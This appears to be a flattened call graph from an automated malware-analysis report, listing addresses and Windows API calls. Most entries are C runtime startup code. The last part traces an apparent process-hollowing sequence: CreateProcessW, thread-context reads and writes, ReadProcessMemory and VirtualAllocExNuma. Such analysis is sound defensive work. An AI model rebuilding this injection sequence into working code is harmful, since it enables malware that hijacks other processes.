10001494 7779->7780 7781 1000147c 7779->7781 7931 10002511 7780->7931 7919 1000197b 7781->7919 7784 10001484 GetCurrentThreadId 7784->7765 7786 100013a4 7787 100013b8 7786->7787 7831 10002430 7786->7831 7795 100013bd 7787->7795 7864 100021b1 7787->7864 7795->7765 7796->7757 7945 10001cd9 EncodePointer 7797->7945 7802 10001a35 7804 10001a9d __mtterm 73 API calls 7802->7804 7806 10001a3a 7804->7806 7805 10001a47 7805->7802 7807 10001a52 7805->7807 7806->7767 7808 10002720 __calloc_crt 70 API calls 7807->7808 7809 10001a5f 7808->7809 7810 10001a94 7809->7810 7954 10002698 FlsSetValue 7809->7954 7812 10001a9d __mtterm 73 API calls 7810->7812 7814 10001a99 7812->7814 7813 10001a73 7813->7810 7815 10001a79 7813->7815 7814->7767 7816 1000197b __initptd 70 API calls 7815->7816 7817 10001a81 GetCurrentThreadId 7816->7817 7817->7767 7819 100025f6 WideCharToMultiByte 7818->7819 7820 10002669 7818->7820 7822 10002660 FreeEnvironmentStringsW 7819->7822 7823 10002629 7819->7823 7820->7778 7822->7820 7956 1000276a 7823->7956 7826 10002636 WideCharToMultiByte 7827 10002655 FreeEnvironmentStringsW 7826->7827 7828 1000264c 7826->7828 7827->7820 7829 10002511 _free 70 API calls 7828->7829 7830 10002652 7829->7830 7830->7827 7832 10002439 7831->7832 7834 1000243e _strlen 7831->7834 8136 10002efa 7832->8136 7835 10002720 __calloc_crt 70 API calls 7834->7835 7838 100013ad 7834->7838 7843 10002474 _strlen 7835->7843 7836 100024c6 7837 10002511 _free 70 API calls 7836->7837 7837->7838 7838->7787 7858 10001c34 7838->7858 7839 10002720 __calloc_crt 70 API calls 7839->7843 7840 100024ed 7841 10002511 _free 70 API calls 7840->7841 7841->7838 7843->7836 7843->7838 7843->7839 7843->7840 7844 10002504 7843->7844 8140 100043ce 7843->8140 7845 100037f0 __invoke_watson 8 API calls 7844->7845 7846 10002510 7845->7846 7848 10002211 7847->7848 7849 10002216 GetModuleFileNameA 7847->7849 7850 10002efa ___initmbctable 96 API calls 7848->7850 7851 10002243 7849->7851 7850->7849 8450 100022b4 7851->8450 7854 1000276a __malloc_crt 70 API calls 7855 1000227c 7854->7855 7856 100022b4 _parse_cmdline 80 API calls 7855->7856 7857 10002296 7855->7857 7856->7857 7857->7786 7860 10001c40 __IsNonwritableInCurrentImage 7858->7860 8462 10003d3b 7860->8462 7861 10001c5e __initterm_e 7863 10001c7f __IsNonwritableInCurrentImage 7861->7863 8465 10003d26 7861->8465 7863->7787 7868 100021b8 7864->7868 7865 100013cd 7869 10001a9d 7865->7869 7866 10002511 _free 70 API calls 7866->7868 7867 100021d1 DeleteCriticalSection 7867->7868 7868->7865 7868->7866 7868->7867 7870 10001aa7 7869->7870 7872 10001aad 7869->7872 8530 1000267c FlsFree 7870->8530 7873 10002a7f DeleteCriticalSection 7872->7873 7874 10002a9b 7872->7874 7875 10002511 _free 70 API calls 7873->7875 7876 10002aa7 DeleteCriticalSection 7874->7876 7877 100013d2 7874->7877 7875->7872 7876->7874 7877->7765 7879 10001d5d _doexit 70 API calls 7878->7879 7880 10001c30 7879->7880 7880->7758 7882 10001b2e 7881->7882 7883 10001b1c 7881->7883 7884 10002511 _free 70 API calls 7882->7884 7883->7882 7885 10002511 _free 70 API calls 7883->7885 7886 10001b3b 7884->7886 7885->7883 7887 10001b5f 7886->7887 7889 10002511 _free 70 API calls 7886->7889 7888 10002511 _free 70 API calls 7887->7888 7890 10001b6b 7888->7890 7889->7886 7891 10002511 _free 70 API calls 7890->7891 7892 10001b7c 7891->7892 7893 10002511 _free 70 API calls 7892->7893 7894 10001b87 7893->7894 7895 10001ba2 EncodePointer 7894->7895 7898 10002511 _free 70 API calls 7894->7898 7896 10001bbd 7895->7896 7897 10001bb7 7895->7897 7900 10001bda InterlockedDecrement 7896->7900 7902 10002511 _free 70 API calls 7896->7902 7899 10002511 _free 70 API calls 7897->7899 7901 10001ba1 7898->7901 7899->7896 7903 100013fe 7900->7903 7904 10001beb 7900->7904 7901->7895 7905 10001bd3 7902->7905 7903->7769 7903->7772 7904->7903 7906 10002511 _free 70 API calls 7904->7906 7905->7900 7906->7903 7908 1000143a 7907->7908 7909 1000142c 7907->7909 7908->7765 7909->7908 7910 10001a9d __mtterm 73 API calls 7909->7910 7910->7908 7911->7762 7915 10002727 7912->7915 7914 1000145e 7914->7765 7918 10002698 FlsSetValue 7914->7918 7915->7914 7916 10002745 Sleep 7915->7916 8531 100045f8 7915->8531 7917 1000275c 7916->7917 7917->7914 7917->7915 7918->7779 7920 10001987 ___lock_fhandle 7919->7920 7921 10002a35 __lock 69 API calls 7920->7921 7922 100019bd InterlockedIncrement 7921->7922 8539 10001a15 7922->8539 7925 10002a35 __lock 69 API calls 7926 100019de 7925->7926 7927 10002bae ___addlocaleref 8 API calls 7926->7927 7928 100019fc 7927->7928 8542 10001a1e 7928->8542 7930 10001a09 ___lock_fhandle 7930->7784 7932 10002543 __dosmaperr 7931->7932 7933 1000251a HeapFree 7931->7933 7932->7765 7933->7932 7934 1000252f 7933->7934 7935 10003a67 __setmbcp 68 API calls 7934->7935 7936 10002535 GetLastError 7935->7936 7936->7932 7938 100018cb 7937->7938 7944 100018f1 7937->7944 7939 100018d9 7938->7939 8547 1000268a FlsGetValue 7938->8547 8548 10002698 FlsSetValue 7939->8548 7942 100018e9 8549 10001787 7942->8549 7944->7765 7946 10001cea __init_pointers __initp_misc_winsig 7945->7946 7955 10003d8e EncodePointer 7946->7955 7948 10001a2c 7949 10002b64 7948->7949 7950 10002b70 7949->7950 7951 10002b76 InitializeCriticalSectionAndSpinCount 7950->7951 7952 10001a31 7950->7952 7951->7950 7952->7802 7953 1000266e FlsAlloc 7952->7953 7953->7805 7954->7813 7955->7948 7957 10002778 7956->7957 7959 1000262f 7957->7959 7960 1000278b Sleep 7957->7960 7961 100044bb 7957->7961 7959->7822 7959->7826 7960->7957 7962 10004536 7961->7962 7970 100044c7 7961->7970 7963 10003d9f __calloc_impl DecodePointer 7962->7963 7964 1000453c 7963->7964 7966 10003a67 __setmbcp 69 API calls 7964->7966 7968 1000452e 7966->7968 7967 100044fa HeapAlloc 7967->7968 7967->7970 7968->7957 7970->7967 7971 10004522 7970->7971 7975 10004520 7970->7975 7977 1000381b 7970->7977 7986 10003878 7970->7986 8016 10001aec 7970->8016 8019 10003d9f DecodePointer 7970->8019 8021 10003a67 7971->8021 7976 10003a67 __setmbcp 69 API calls 7975->7976 7976->7968 8024 10005080 7977->8024 7979 10003822 7980 10005080 __NMSG_WRITE 70 API calls 7979->7980 7984 1000382f 7979->7984 7980->7984 7981 10003878 __NMSG_WRITE 70 API calls 7982 10003847 7981->7982 7985 10003878 __NMSG_WRITE 70 API calls 7982->7985 7983 10003851 7983->7970 7984->7981 7984->7983 7985->7983 7987 10003896 __NMSG_WRITE 7986->7987 7988 10005080 __NMSG_WRITE 67 API calls 7987->7988 7993 100039bd 7987->7993 7992 100038a9 7988->7992 7990 10003a26 7990->7970 7991 100039c2 GetStdHandle 7991->7993 7997 100039d0 _strlen 7991->7997 7992->7991 7994 10005080 __NMSG_WRITE 67 API calls 7992->7994 8099 10004672 7993->8099 7995 100038ba 7994->7995 7995->7991 7996 100038cc 7995->7996 7996->7993 8046 10004f4d 7996->8046 7997->7993 7999 10003a09 WriteFile 7997->7999 7999->7993 8001 10003a28 8003 100037f0 __invoke_watson 8 API calls 8001->8003 8002 100038f9 GetModuleFileNameW 8004 10003919 8002->8004 8007 10003929 __NMSG_WRITE 8002->8007 8006 10003a32 8003->8006 8005 10004f4d __NMSG_WRITE 67 API calls 8004->8005 8005->8007 8007->8001 8008 1000396f 8007->8008 8055 10004fc2 8007->8055 8008->8001 8064 10004ee1 8008->8064 8012 10004ee1 __NMSG_WRITE 67 API calls 8013 100039a6 8012->8013 8013->8001 8014 100039ad 8013->8014 8073 100050c0 EncodePointer 8014->8073 8117 10001aba GetModuleHandleExW 8016->8117 8020 10003db2 8019->8020 8020->7970 8120 1000190c GetLastError 8021->8120 8023 10003a6c 8023->7975 8025 1000508a 8024->8025 8026 10005094 8025->8026 8027 10003a67 __setmbcp 70 API calls 8025->8027 8026->7979 8028 100050b0 8027->8028 8031 100037e0 8028->8031 8034 100037b5 DecodePointer 8031->8034 8035 100037c8 8034->8035 8040 100037f0 IsProcessorFeaturePresent 8035->8040 8038 100037b5 __commit 8 API calls 8039 100037ec 8038->8039 8039->7979 8041 100037fb 8040->8041 8042 10003685 __call_reportfault 7 API calls 8041->8042 8043 10003810 8042->8043 8044 100026f5 ___raise_securityfailure GetCurrentProcess TerminateProcess 8043->8044 8045 100037df 8044->8045 8045->8038 8047 10004f58 8046->8047 8048 10004f66 8046->8048 8047->8048 8050 10004f7f 8047->8050 8049 10003a67 __setmbcp 70 API calls 8048->8049 8054 10004f70 8049->8054 8052 100038ec 8050->8052 8053 10003a67 __setmbcp 70 API calls 8050->8053 8051 100037e0 __commit 9 API calls 8051->8052 8052->8001 8052->8002 8053->8054 8054->8051 8059 10004fd0 8055->8059 8056 10004fd4 8057 10003a67 __setmbcp 70 API calls 8056->8057 8058 10004fd9 8056->8058 8060 10005004 8057->8060 8058->8008 8059->8056 8059->8058 8062 10005013 8059->8062 8061 100037e0 __commit 9 API calls 8060->8061 8061->8058 8062->8058 8063 10003a67 __setmbcp 70 API calls 8062->8063 8063->8060 8066 10004eed 8064->8066 8067 10004efb 8064->8067 8065 10003a67 __setmbcp 70 API calls 8068 10004f05 8065->8068 8066->8067 8071 10004f27 8066->8071 8067->8065 8069 100037e0 __commit 9 API calls 8068->8069 8070 1000398f 8069->8070 8070->8001 8070->8012 8071->8070 8072 10003a67 __setmbcp 70 API calls 8071->8072 8072->8068 8106 100026a9 8073->8106 8076 100051b1 IsDebuggerPresent 8078 100051d6 8076->8078 8079 100051bb 8076->8079 8077 10005103 LoadLibraryExW 8080 1000511a GetLastError 8077->8080 8081 1000513e GetProcAddress 8077->8081 8083 100051c9 8078->8083 8084 100051db DecodePointer 8078->8084 8082 100051c2 OutputDebugStringW 8079->8082 8079->8083 8085 10005129 LoadLibraryW 8080->8085 8089 100051ce 8080->8089 8086 10005152 7 API calls 8081->8086 8081->8089 8082->8083 8083->8089 8093 10005202 DecodePointer DecodePointer 8083->8093 8097 1000521a 8083->8097 8084->8089 8085->8081 8085->8089 8087 1000519a GetProcAddress EncodePointer 8086->8087 8088 100051ae 8086->8088 8087->8088 8088->8076 8090 10004672 setSBUpLow 6 API calls 8089->8090 8095 100052a0 8090->8095 8091 10005252 DecodePointer 8092 1000523e DecodePointer 8091->8092 8096 10005259 8091->8096 8092->8089 8093->8097 8095->7993 8096->8092 8098 1000526a DecodePointer 8096->8098 8097->8091 8097->8092 8098->8092 8100 1000467a 8099->8100 8101 1000467c IsProcessorFeaturePresent 8099->8101 8100->7990 8103 10005fe5 8101->8103 8109 10005f94 IsDebuggerPresent 8103->8109 8107 100026b8 GetModuleHandleW GetProcAddress 8106->8107 8108 100026d8 8106->8108 8107->8108 8108->8076 8108->8077 8110 10005fa9 ___raise_securityfailure 8109->8110 8115 1000270a SetUnhandledExceptionFilter UnhandledExceptionFilter 8110->8115 8112 10005fb1 ___raise_securityfailure 8116 100026f5 GetCurrentProcess TerminateProcess 8112->8116 8114 10005fce 8114->7990 8115->8112 8116->8114 8118 10001ad3 GetProcAddress 8117->8118 8119 10001ae5 ExitProcess 8117->8119 8118->8119 8134 1000268a FlsGetValue 8120->8134 8122 10001921 8123 1000196f SetLastError 8122->8123 8124 10002720 __calloc_crt 67 API calls 8122->8124 8123->8023 8125 10001934 8124->8125 8125->8123 8135 10002698 FlsSetValue 8125->8135 8127 10001948 8128 10001966 8127->8128 8129 1000194e 8127->8129 8130 10002511 _free 67 API calls 8128->8130 8131 1000197b __initptd 67 API calls 8129->8131 8132 1000196c 8130->8132 8133 10001956 GetCurrentThreadId 8131->8133 8132->8123 8133->8123 8134->8122 8135->8127 8137 10002f03 8136->8137 8138 10002f0a 8136->8138 8149 100032e2 8137->8149 8138->7834 8141 100043e7 8140->8141 8142 100043d9 8140->8142 8143 10003a67 __setmbcp 70 API calls 8141->8143 8142->8141 8145 100043fd 8142->8145 8148 100043ee 8143->8148 8144 100037e0 __commit 9 API calls 8146 100043f8 8144->8146 8145->8146 8147 10003a67 __setmbcp 70 API calls 8145->8147 8146->7843 8147->8148 8148->8144 8150 100032ee ___lock_fhandle 8149->8150 8180 100018f4 8150->8180 8154 10003300 8201 10002fda 8154->8201 8157 1000276a __malloc_crt 70 API calls 8158 10003322 8157->8158 8159 10003455 ___lock_fhandle 8158->8159 8208 10003490 8158->8208 8159->8138 8162 10003465 8162->8159 8167 10003478 8162->8167 8169 10002511 _free 70 API calls 8162->8169 8163 10003358 InterlockedDecrement 8164 10003380 InterlockedIncrement 8163->8164 8165 1000336b 8163->8165 8164->8159 8166 10003397 8164->8166 8165->8164 8168 10002511 _free 70 API calls 8165->8168 8166->8159 8218 10002a35 8166->8218 8170 10003a67 __setmbcp 70 API calls 8167->8170 8171 1000337c 8168->8171 8169->8167 8170->8159 8171->8164 8173 100033ab InterlockedDecrement 8175 10003429 8173->8175 8176 1000343c InterlockedIncrement 8173->8176 8175->8176 8178 10002511 _free 70 API calls 8175->8178 8225 1000345a 8176->8225 8179 1000343b 8178->8179 8179->8176 8181 1000190c __getptd_noexit 70 API calls 8180->8181 8182 100018fa 8181->8182 8183 10001907 8182->8183 8228 10001c09 8182->8228 8185 1000323d 8183->8185 8186 10003249 ___lock_fhandle 8185->8186 8187 100018f4 __setmbcp 70 API calls 8186->8187 8188 1000324e 8187->8188 8189 10003261 8188->8189 8190 10002a35 __lock 70 API calls 8188->8190 8192 1000326f ___lock_fhandle 8189->8192 8196 10001c09 __amsg_exit 70 API calls 8189->8196 8191 1000327f 8190->8191 8193 100032c8 8191->8193 8194 100032b0 InterlockedIncrement 8191->8194 8195 10003296 InterlockedDecrement 8191->8195 8192->8154 8264 100032d9 8193->8264 8194->8193 8195->8194 8198 100032a1 8195->8198 8196->8192 8198->8194 8199 10002511 _free 70 API calls 8198->8199 8200 100032af 8199->8200 8200->8194 8268 10002f18 8201->8268 8204 10002ff9 GetOEMCP 8206 10003022 8204->8206 8205 1000300b 8205->8206 8207 10003010 GetACP 8205->8207 8206->8157 8206->8159 8207->8206 8209 10002fda getSystemCP 82 API calls 8208->8209 8210 100034ad 8209->8210 8213 10003501 IsValidCodePage 8210->8213 8215 100034b7 setSBCS 8210->8215 8217 10003526 _memset __setmbcp_nolock 8210->8217 8211 10004672 setSBUpLow 6 API calls 8212 10003349 8211->8212 8212->8162 8212->8163 8214 10003513 GetCPInfo 8213->8214 8213->8215 8214->8215 8214->8217 8215->8211 8359 100030af GetCPInfo 8217->8359 8219 10002a46 8218->8219 8220 10002a59 EnterCriticalSection 8218->8220 8424 10002abd 8219->8424 8220->8173 8222 10002a4c 8222->8220 8223 10001c09 __amsg_exit 69 API calls 8222->8223 8224 10002a58 8223->8224 8224->8220 8449 10002b99 LeaveCriticalSection 8225->8449 8227 10003461 8227->8159 8229 1000381b __FF_MSGBANNER 70 API calls 8228->8229 8230 10001c11 8229->8230 8231 10003878 __NMSG_WRITE 70 API calls 8230->8231 8232 10001c19 8231->8232 8235 10001cc5 8232->8235 8238 10001d5d 8235->8238 8237 10001c24 8239 10001d69 ___lock_fhandle 8238->8239 8240 10002a35 __lock 63 API calls 8239->8240 8241 10001d70 8240->8241 8242 10001e29 __initterm 8241->8242 8243 10001d9e DecodePointer 8241->8243 8258 10001e77 8242->8258 8243->8242 8245 10001db5 DecodePointer 8243->8245 8251 10001dc5 8245->8251 8247 10001e86 ___lock_fhandle 8247->8237 8249 10001dd2 EncodePointer 8249->8251 8250 10001e6e 8252 10001aec __mtinitlocknum 3 API calls 8250->8252 8251->8242 8251->8249 8253 10001de2 DecodePointer EncodePointer 8251->8253 8254 10001e77 8252->8254 8255 10001df4 DecodePointer DecodePointer 8253->8255 8257 10001e84 8254->8257 8263 10002b99 LeaveCriticalSection 8254->8263 8255->8251 8257->8237 8259 10001e57 8258->8259 8260 10001e7d 8258->8260 8259->8247 8262 10002b99 LeaveCriticalSection 8259->8262 8261 10002b99 _doexit LeaveCriticalSection 8260->8261 8261->8259 8262->8250 8263->8257 8267 10002b99 LeaveCriticalSection 8264->8267 8266 100032e0 8266->8189 8267->8266 8269 10002f29 8268->8269 8273 10002f76 8268->8273 8270 100018f4 __setmbcp 70 API calls 8269->8270 8271 10002f2e 8270->8271 8272 10002f57 8271->8272 8276 10002e33 8271->8276 8272->8273 8275 1000323d __setmbcp 72 API calls 8272->8275 8273->8204 8273->8205 8275->8273 8277 10002e3f ___lock_fhandle 8276->8277 8278 100018f4 __setmbcp 70 API calls 8277->8278 8279 10002e44 8278->8279 8280 10002e73 8279->8280 8281 10002e57 8279->8281 8282 10002a35 __lock 70 API calls 8280->8282 8284 100018f4 __setmbcp 70 API calls 8281->8284 8283 10002e7a 8282->8283 8291 10002eaf 8283->8291 8286 10002e5c 8284->8286 8289 10002e6a ___lock_fhandle 8286->8289 8290 10001c09 __amsg_exit 70 API calls 8286->8290 8289->8272 8290->8289 8292 10002e8e 8291->8292 8293 10002eba 8291->8293 8299 10002ea6 8292->8299 8293->8292 8302 10002bae InterlockedIncrement 8293->8302 8295 10002ed0 8295->8292 8314 10002d98 8295->8314 8358 10002b99 LeaveCriticalSection 8299->8358 8301 10002ead 8301->8286 8303 10002bc6 InterlockedIncrement 8302->8303 8304 10002bcb 8302->8304 8303->8304 8305 10002bd5 InterlockedIncrement 8304->8305 8306 10002bd8 8304->8306 8305->8306 8307 10002be3 8306->8307 8308 10002bde InterlockedIncrement 8306->8308 8309 10002bed InterlockedIncrement 8307->8309 8311 10002bf0 8307->8311 8308->8307 8309->8311 8310 10002c07 InterlockedIncrement 8310->8311 8311->8310 8312 10002c1a InterlockedIncrement 8311->8312 8313 10002c2b InterlockedIncrement 8311->8313 8312->8311 8313->8295 8315 10002da7 InterlockedDecrement 8314->8315 8316 10002e2e 8314->8316 8317 10002db8 InterlockedDecrement 8315->8317 8318 10002dbd 8315->8318 8316->8292 8328 10002c3e 8316->8328 8317->8318 8319 10002dc7 InterlockedDecrement 8318->8319 8320 10002dca 8318->8320 8319->8320 8321 10002dd0 InterlockedDecrement 8320->8321 8322 10002dd5 8320->8322 8321->8322 8323 10002ddf InterlockedDecrement 8322->8323 8325 10002de2 8322->8325 8323->8325 8324 10002df9 InterlockedDecrement 8324->8325 8325->8324 8326 10002e0c InterlockedDecrement 8325->8326 8327 10002e1d InterlockedDecrement 8325->8327 8326->8325 8327->8316 8329 10002cb7 8328->8329 8331 10002c53 8328->8331 8330 10002511 _free 70 API calls 8329->8330 8332 10002d04 8329->8332 8333 10002cd8 8330->8333 8331->8329 8340 10002c84 8331->8340 8342 10002511 _free 70 API calls 8331->8342 8334 100047e4 ___free_lc_time 70 API calls 8332->8334 8338 10002d2d 8332->8338 8335 10002511 _free 70 API calls 8333->8335 8336 10002d22 8334->8336 8339 10002ceb 8335->8339 8343 10002511 _free 70 API calls 8336->8343 8337 10002d8c 8344 10002511 _free 70 API calls 8337->8344 8338->8337 8353 10002511 70 API calls _free 8338->8353 8345 10002511 _free 70 API calls 8339->8345 8346 10002511 _free 70 API calls 8340->8346 8357 10002ca2 8340->8357 8341 10002511 _free 70 API calls 8347 10002cac 8341->8347 8348 10002c79 8342->8348 8343->8338 8349 10002d92 8344->8349 8350 10002cf9 8345->8350 8351 10002c97 8346->8351 8352 10002511 _free 70 API calls 8347->8352 8354 10004681 ___free_lconv_mon 70 API calls 8348->8354 8349->8292 8355 10002511 _free 70 API calls 8350->8355 8356 1000477d ___free_lconv_num 70 API calls 8351->8356 8352->8329 8353->8338 8354->8340 8355->8332 8356->8357 8357->8341 8358->8301 8360 10003191 8359->8360 8365 100030e7 8359->8365 8362 10004672 setSBUpLow 6 API calls 8360->8362 8364 1000323b 8362->8364 8364->8215 8369 10004e9b 8365->8369 8368 10004d4d ___crtLCMapStringA 84 API calls 8368->8360 8370 10002f18 _LocaleUpdate::_LocaleUpdate 80 API calls 8369->8370 8371 10004eac 8370->8371 8379 10004daf 8371->8379 8374 10004d4d 8375 10002f18 _LocaleUpdate::_LocaleUpdate 80 API calls 8374->8375 8376 10004d5e 8375->8376 8396 10004b64 8376->8396 8380 10004dd6 MultiByteToWideChar 8379->8380 8381 10004dc9 8379->8381 8383 10004e02 8380->8383 8391 10004dfb 8380->8391 8381->8380 8382 10004672 setSBUpLow 6 API calls 8384 10003148 8382->8384 8385 10004e1a _memset __alloca_probe_16 8383->8385 8386 100044bb _malloc 70 API calls 8383->8386 8384->8374 8387 10004e56 MultiByteToWideChar 8385->8387 8385->8391 8386->8385 8388 10004e80 8387->8388 8389 10004e70 GetStringTypeW 8387->8389 8392 10004d91 8388->8392 8389->8388 8391->8382 8393 10004d9b 8392->8393 8395 10004dac 8392->8395 8394 10002511 _free 70 API calls 8393->8394 8393->8395 8394->8395 8395->8391 8398 10004b7d MultiByteToWideChar 8396->8398 8399 10004bdc 8398->8399 8402 10004be3 8398->8402 8400 10004672 setSBUpLow 6 API calls 8399->8400 8403 10003169 8400->8403 8401 10004c36 MultiByteToWideChar 8404 10004c4f 8401->8404 8419 10004c9e 8401->8419 8405 100044bb _malloc 70 API calls 8402->8405 8409 10004c00 __alloca_probe_16 8402->8409 8403->8368 8421 1000531f LCMapStringEx 8404->8421 8405->8409 8407 10004d91 __freea 70 API calls 8407->8399 8408 10004c63 8410 10004c7a 8408->8410 8413 10004ca6 8408->8413 8408->8419 8409->8399 8409->8401 8410->8419 8422 1000531f LCMapStringEx 8410->8422 8412 10004cc1 __alloca_probe_16 8412->8419 8423 1000531f LCMapStringEx 8412->8423 8413->8412 8414 100044bb _malloc 70 API calls 8413->8414 8414->8412 8416 10004d2b 8417 10004d91 __freea 70 API calls 8416->8417 8417->8419 8418 10004d03 8418->8416 8420 10004d1d WideCharToMultiByte 8418->8420 8419->8407 8420->8416 8421->8408 8422->8419 8423->8418 8425 10002ac9 ___lock_fhandle 8424->8425 8426 1000381b __FF_MSGBANNER 69 API calls 8425->8426 8439 10002ae8 8425->8439 8427 10002ad7 8426->8427 8429 10003878 __NMSG_WRITE 69 API calls 8427->8429 8428 1000276a __malloc_crt 69 API calls 8430 10002afe 8428->8430 8431 10002ade 8429->8431 8433 10002b14 8430->8433 8434 10002b05 8430->8434 8436 10001aec __mtinitlocknum 3 API calls 8431->8436 8432 10002b0a ___lock_fhandle 8432->8222 8435 10002a35 __lock 69 API calls 8433->8435 8437 10003a67 __setmbcp 69 API calls 8434->8437 8438 10002b1b 8435->8438 8436->8439 8437->8432 8440 10002b2a InitializeCriticalSectionAndSpinCount 8438->8440 8441 10002b3f 8438->8441 8439->8428 8439->8432 8442 10002b45 8440->8442 8443 10002511 _free 69 API calls 8441->8443 8445 10002b5b 8442->8445 8443->8442 8448 10002b99 LeaveCriticalSection 8445->8448 8447 10002b62 8447->8432 8448->8447 8449->8227 8452 100022d6 8450->8452 8455 1000233a 8452->8455 8456 100043b8 8452->8456 8453 10002259 8453->7854 8453->7857 8454 100043b8 _parse_cmdline 80 API calls 8454->8455 8455->8453 8455->8454 8459 10004362 8456->8459 8460 10002f18 _LocaleUpdate::_LocaleUpdate 80 API calls 8459->8460 8461 10004374 8460->8461 8461->8452 8463 10003d3e EncodePointer 8462->8463 8463->8463 8464 10003d58 8463->8464 8464->7861 8468 10003c30 8465->8468 8467 10003d31 8467->7863 8469 10003c3c ___lock_fhandle 8468->8469 8476 10001d4b 8469->8476 8475 10003c5f ___lock_fhandle 8475->8467 8477 10002a35 __lock 70 API calls 8476->8477 8478 10001d52 8477->8478 8479 10003c70 DecodePointer DecodePointer 8478->8479 8480 10003c9d 8479->8480 8481 10003c4d 8479->8481 8480->8481 8493 100052a2 8480->8493 8490 10003c6a 8481->8490 8483 10003d00 EncodePointer EncodePointer 8483->8481 8484 10003cd4 8484->8481 8487 100027b3 __realloc_crt 74 API calls 8484->8487 8488 10003cee EncodePointer 8484->8488 8485 10003caf 8485->8483 8485->8484 8500 100027b3 8485->8500 8489 10003ce8 8487->8489 8488->8483 8489->8481 8489->8488 8526 10001d54 8490->8526 8494 100052c0 HeapSize 8493->8494 8495 100052ab 8493->8495 8494->8485 8496 10003a67 __setmbcp 70 API calls 8495->8496 8497 100052b0 8496->8497 8498 100037e0 __commit 9 API calls 8497->8498 8499 100052bb 8498->8499 8499->8485 8503 100027ba 8500->8503 8502 100027f9 8502->8484 8503->8502 8504 100027da Sleep 8503->8504 8505 1000454d 8503->8505 8504->8503 8506 10004561 8505->8506 8507 10004556 8505->8507 8509 10004569 8506->8509 8518 10004576 8506->8518 8508 100044bb _malloc 70 API calls 8507->8508 8510 1000455e 8508->8510 8511 10002511 _free 70 API calls 8509->8511 8510->8503 8525 10004571 __dosmaperr 8511->8525 8512 100045ae 8513 10003d9f __calloc_impl DecodePointer 8512->8513 8515 100045b4 8513->8515 8514 1000457e HeapReAlloc 8514->8518 8514->8525 8516 10003a67 __setmbcp 70 API calls 8515->8516 8516->8525 8517 100045de 8520 10003a67 __setmbcp 70 API calls 8517->8520 8518->8512 8518->8514 8518->8517 8519 10003d9f __calloc_impl DecodePointer 8518->8519 8522 100045c6 8518->8522 8519->8518 8521 100045e3 GetLastError 8520->8521 8521->8525 8523 10003a67 __setmbcp 70 API calls 8522->8523 8524 100045cb GetLastError 8523->8524 8524->8525 8525->8503 8529 10002b99 LeaveCriticalSection 8526->8529 8528 10001d5b 8528->8475 8529->8528 8530->7872 8532 10004603 8531->8532 8537 1000461e 8531->8537 8533 1000460f 8532->8533 8532->8537 8534 10003a67 __setmbcp 69 API calls 8533->8534 8536 10004614 8534->8536 8535 1000462e RtlAllocateHeap 8535->8536 8535->8537 8536->7915 8537->8535 8537->8536 8538 10003d9f __calloc_impl DecodePointer 8537->8538 8538->8537 8545 10002b99 LeaveCriticalSection 8539->8545 8541 100019d7 8541->7925 8546 10002b99 LeaveCriticalSection 8542->8546 8544 10001a25 8544->7930 8545->8541 8546->8544 8547->7939 8548->7942 8550 10001793 ___lock_fhandle 8549->8550 8551 100017ac 8550->8551 8552 1000189d ___lock_fhandle 8550->8552 8553 10002511 _free 70 API calls 8550->8553 8554 100017bb 8551->8554 8556 10002511 _free 70 API calls 8551->8556 8552->7944 8553->8551 8555 100017ca 8554->8555 8557 10002511 _free 70 API calls 8554->8557 8558 100017d9 8555->8558 8559 10002511 _free 70 API calls 8555->8559 8556->8554 8557->8555 8560 100017e8 8558->8560 8561 10002511 _free 70 API calls 8558->8561 8559->8558 8562 10002511 _free 70 API calls 8560->8562 8563 100017f7 8560->8563 8561->8560 8562->8563 8564 10002511 _free 70 API calls 8563->8564 8565 10001806 8563->8565 8564->8565 8566 10001818 8565->8566 8567 10002511 _free 70 API calls 8565->8567 8568 10002a35 __lock 70 API calls 8566->8568 8567->8566 8569 10001820 8568->8569 8570 10001845 8569->8570 8571 1000182c InterlockedDecrement 8569->8571 8585 100018a9 8570->8585 8571->8570 8573 10001837 8571->8573 8573->8570 8576 10002511 _free 70 API calls 8573->8576 8575 10002a35 __lock 70 API calls 8577 10001859 8575->8577 8576->8570 8578 1000188a 8577->8578 8579 10002d98 ___removelocaleref 8 API calls 8577->8579 8588 100018b5 8578->8588 8583 1000186e 8579->8583 8582 10002511 _free 70 API calls 8582->8552 8583->8578 8584 10002c3e ___freetlocinfo 70 API calls 8583->8584 8584->8578 8591 10002b99 LeaveCriticalSection 8585->8591 8587 10001852 8587->8575 8592 10002b99 LeaveCriticalSection 8588->8592 8590 10001897 8590->8582 8591->8587 8592->8590 7573 24508b7 7585 245005f GetPEB 7573->7585 7575 2450927 7586 2450838 7575->7586 7577 245092f 7578 24509c2 7577->7578 7579 24509de CreateFileW 7577->7579 7579->7578 7580 2450a08 VirtualAlloc ReadFile 7579->7580 7580->7578 7583 2450a35 7580->7583 7581 2450a4e 7583->7581 7584 2450db7 ExitProcess 7583->7584 7599 245020a 7583->7599 7585->7575 7614 245005f GetPEB 7586->7614 7588 245084c 7615 245005f GetPEB 7588->7615 7590 245085f 7616 245005f GetPEB 7590->7616 7592 2450872 7617 24507da 7592->7617 7594 2450880 7595 245089c VirtualAllocExNuma 7594->7595 7596 24508a9 7595->7596 7622 245073a 7596->7622 7629 245005f GetPEB 7599->7629 7601 2450218 7602 24503b3 7601->7602 7603 24503c1 CreateProcessW 7601->7603 7607 24503eb 7601->7607 7609 2451320 11 API calls 7601->7609 7611 2450675 Wow64SetThreadContext 7601->7611 7613 2451171 11 API calls 7601->7613 7630 2451206 7601->7630 7639 2450fbf 7601->7639 7648 24510c0 7601->7648 7602->7583 7604 24503f0 Wow64GetThreadContext 7603->7604 7603->7607 7605 2450410 ReadProcessMemory 7604->7605 7604->7607 7605->7601 7605->7607 7607->7602 7657 2451171 7607->7657 7609->7601 7611->7601 7611->7607 7613->7601 7614->7588 7615->7590 7616->7592 7627 245005f GetPEB 7617->7627 7619 24507ea 7620 24507f0 GetSystemInfo 7619->7620 7621 245081b 7620->7621 7621->7594 7628 245005f GetPEB 7622->7628 7624 2450746 7625 2450766 VirtualAlloc 7624->7625 7626 2450783 7625->7626 7626->7577 7627->7619 7628->7624 7629->7601 7631 2451221 7630->7631 7666 245013e GetPEB 7631->7666 7633 2451242 7634 24512fa 7633->7634 7635 245124a 7633->7635 7683 245164c 7634->7683 7668 2450dc0 7635->7668 7638 24512e1 7638->7601 7640 2450fda 7639->7640 7641 245013e GetPEB 7640->7641 7642 2450ffb 7641->7642 7643 2451003 7642->7643 7644 245108d 7642->7644 7646 2450dc0 10 API calls 7643->7646 7693 2451670 